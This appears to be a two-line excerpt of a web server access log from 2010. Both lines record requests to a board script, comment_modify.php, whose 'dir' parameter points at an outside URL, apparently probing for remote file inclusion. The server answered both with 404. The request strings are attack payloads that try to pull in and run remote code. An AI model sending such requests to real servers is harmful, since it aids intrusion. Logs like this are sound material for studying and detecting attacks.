81.176.226.164 - - [08/Feb/2010:00:06:38 -0800] "GET /logs/access.log/////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
81.176.226.164 - - [08/Feb/2010:00:06:38 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
